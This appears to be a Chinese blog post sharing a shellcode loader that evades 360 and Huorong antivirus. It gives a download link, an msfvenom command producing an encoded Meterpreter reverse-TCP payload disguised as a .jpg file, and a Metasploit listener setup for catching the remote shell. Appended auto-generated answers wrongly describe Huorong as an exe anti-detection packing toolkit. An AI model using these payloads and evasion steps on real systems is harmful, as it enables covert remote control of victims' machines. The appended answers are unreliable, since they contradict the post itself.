【工具分享】免杀360&火绒的shellcode加载器

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

1. 免杀效果

shellcode加载器目前可以过360&火绒Windows Defender没戏。。。

代码和思路暂不开源!

你可以在我的GitHub上下载该工具:https://github.com/crow821/crowsec/tree/master/BypassAV_360_huornog

如果你访问GitHub困难,你可以在乌鸦安全公众号后台直接回复关键字:加载器 下载!

使用方法:

生成msfcsshellcode原生格式,命名为crowsec.jpg(这个是写死的),将其和crowsec_shelllcodeBypass.exe(这个名字可以修改的)放在一个目录下,直接双击即可!

1.1 当前免杀能力

1.2 半年前免杀能力

这个数据已没有意义。

这个shellcode加载器工具是我在2021-06-21号做的,优化之后VT查杀为0/68,一个月之后我再去检查,甚至到现在去检查,当前的VT查杀依旧为0/68

2021-06-21是能过火绒360Windows Defender(关闭自动发送可疑样本)

前几天在测试的时候,发现过不了Windows Defender,今天稍微优化了一下,发现还是过不了Windows Defender,主要原因是识别了msf的部分特征!!!

鉴于目前已经有了其他的免杀方案,所以在这里就把工具分享出来(🐶),至少还能过360火绒。(放出来之后,基本上几小时就没用了,所以仅供参考!)。

 

查询时间:2022.01.19

 

3. 使用方法

3.1. msf上线

在这里使用msfvenon生成shellcode,为了好点的效果,这里使用shikata_ga_nai 编码器器对shellcode进行混淆编码,编码之后的shellcode并不是所有杀软都识别不出来,详情可以看我以前的文章: 

老树开新花之shellcode_launcher免杀Windows Defender

 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 -b '\x00'  lhost=10.211.55.2 lport=1234  -f raw -o crowsec.jpg

 

使用msf进行监听:

 

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload  windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:1234

3.1.1 360

i

3.1.2 Windows Defender

被杀

 

3.1.3 火绒

 

3.2 Cobalt Strike上线

在这里只说思路,能够过火绒360,但是不能过Windows Defender,同样的问题:特征出现在shellcode上面。

 

 

将文件保存为crowsec.jpg(下图是一个示例,主要是太累了,不想换了。。。)

image.png

现将生成的bin文件修改为png文件,然后双击上线操作

 

但是这里可以发现,当前的payload已经被标记特征,直接被杀,但是免杀360火绒是不影响的。

往期推荐

老树开新花之shellcode_launcher免杀Windows Defender

自写go加载器加壳免杀——过国内主流杀软

PowerShell随机免杀结合ps2exe上线

pyinstaller打包exe免杀和逆向浅析

upx加壳过360

go加壳分离免杀过国内主流杀软

[文末抽奖] 免杀:GO实现shellcode加载器过360

pyinstaller打包逆向分析,顺便免杀Windows Defender

微信公众号:乌鸦安全 

图片

扫取二维码获取更多信息!

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
### 回答1: 火绒免杀加壳工具包是一款能够让程序避开杀毒软件检测的软件开发工具。该工具包可以让用户通过一系列的操作,将编写好的程序进行加密和壳化处理。 火绒免杀加壳工具包具备了多种加密和保护功能,其中包括域名加密、资源加密、指令混淆、调试保护等。通过这些功能,用户可以有效的避免杀毒软件对程序的检测和拦截。 火绒免杀加壳工具包的操作简单直观,即使是初学者也可以轻松上手。用户只需要将编写好的程序上传到工具包中,然后根据需要进行选择加密和保护功能的操作,最后点击“加壳”按钮即可完成加壳处理。 在网络安全越来越重要的今天,火绒免杀加壳工具包对于保护程序的安全性有着重要的作用。同时,该工具包的出现也提醒我们,只有真正的了解和掌握技术才能应对不断变化的网络安全环境,才能更好地保护自己的网络安全和信息安全。 ### 回答2: 火绒是一款国内知名的免费杀毒软件,同时还提供了exe免杀加壳工具包。这个工具包的作用是对exe程序进行加壳,以此来防止病毒和恶意软件的检测和识别。 火绒的exe免杀加壳工具包具有以下特点: 1. 简单易用:该工具包的操作方法简单明了,任何人都可以快速上手,即使没有编程经验也可以轻松使用。 2. 安全可靠:火绒工具包使用先进的加密技术,保证了加壳后的程序能够更好地隐藏自己,并且不会被杀软和病毒检测出来。 3. 兼容性强:火绒工具包不仅支持32位和64位的Windows系统,还支持多种编程语言,包括C++、C#、Delphi、VB等。 4. 灵活性高:火绒工具包具有多种加壳选项,使用者可以根据需要选择不同的加壳方式,达到更好的防御效果。 总之,火绒的exe免杀加壳工具包是一款非常实用的工具,它能够帮助开发者和安全专家更好地保护自己的软件和系统免受恶意攻击。同时,由于火绒的声誉和安全性备受信任,该工具包的使用也更加放心和可靠。 ### 回答3: 火绒是一种exe免杀加壳工具包。它的作用是将原始的可执行文件进行加密处理,增加可执行文件在被检测时的混淆性和难度,以避免被杀软检测出来并绕过杀软的防御,使恶意程序可以成功运行。 火绒可以通过对加密算法进行优化,对代码进行混淆等方式,使加壳后的代码在被杀软检测时更加难以被识别。同时,火绒还可以免费提供远程免杀服务,帮助使用者避开杀软检测。 然而,使用火绒进行加壳并不意味着可以逃避所有安全防御。越来越多的杀软和安全产品正在开发新的技术和方法来解决加壳程序的问题。此外,使用加壳程序也有可能会对合法软件造成误判,影响正常的使用。因此,使用火绒或其他加壳工具包时,应该在进行必要的检测和测试后再使用,以免给系统安全和使用造成不必要的影响。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值